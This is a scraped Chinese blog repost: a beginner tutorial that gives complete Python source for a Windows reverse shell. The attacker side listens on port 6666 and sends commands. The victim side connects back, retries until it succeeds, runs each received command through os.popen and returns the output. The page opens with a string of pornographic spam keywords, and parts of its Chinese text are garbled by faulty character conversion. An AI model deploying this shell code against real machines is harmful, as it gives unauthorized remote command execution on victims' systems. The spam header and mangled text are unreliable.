日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

Windows下的反弹shell

發(fā)布時間:2025/3/19 windows 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Windows下的反弹shell 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

今天學習內(nèi)容就是反彈shell啦~~
當服務(wù)器端攻擊客戶端時,此時客戶端IP地址未知,所以要使用反向shell
在這里分別寫服務(wù)器端代碼和客戶端代碼;注:每次運行時要先開服務(wù)器端
服務(wù)器端(攻擊者,導(dǎo)入模塊:import socket)
基本步驟:
1、創(chuàng)建套接字

s=socket.socket()

2、進行綁定(ip:允許連接的ip,服務(wù)器端端口)

s.bind(("0.0.0.0",6666))

3、允許連入的主機數(shù)

s.listen()

4、創(chuàng)建接口與連入的主機地址

con,addr=s.accept()

具體代碼:

import sockets = socket.socket() s.bind(('0.0.0.0',6666)) s.listen(5) con,addr = s.accept() print(addr)for i in range(3):cmd = input('第%d條命令:'%(i+1))con.send(cmd.encode())result = con.recv(65536)print(result.decode()) con.close()

客戶端(被攻擊者,導(dǎo)入模塊:import socket,import os)
基本步驟:
1、創(chuàng)建套接字,連接服務(wù)器(ip:服務(wù)器端,端口:服務(wù)器端)

s=socket.socket() s.connect(('127.0.0.1',6666))

2、收發(fā)數(shù)據(jù)

cmd = s.recv(1024).decode() s.send(result.encode())

3、關(guān)閉套接字

s.close()

具體代碼:

import os import time import sockets = socket.socket()while 1:try:s.connect(('127.0.0.1',6666))breakexcept:time.sleep(5)for i in range(3):cmd = s.recv(1024).decode()print('收到的第%d條命令'%(i+1),cmd)result = os.popen(cmd).read()if result:s.send(result.encode())else:if cmd[:2] == 'cd':os.chdir(cmd[2:].strip())s.send(b'OK!')s.close()

實現(xiàn)效果圖:
客戶端:

服務(wù)器端:

enen~~就醬紫

與50位技術(shù)專家面對面20年技術(shù)見證,附贈技術(shù)全景圖

總結(jié)

以上是生活随笔為你收集整理的Windows下的反弹shell的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。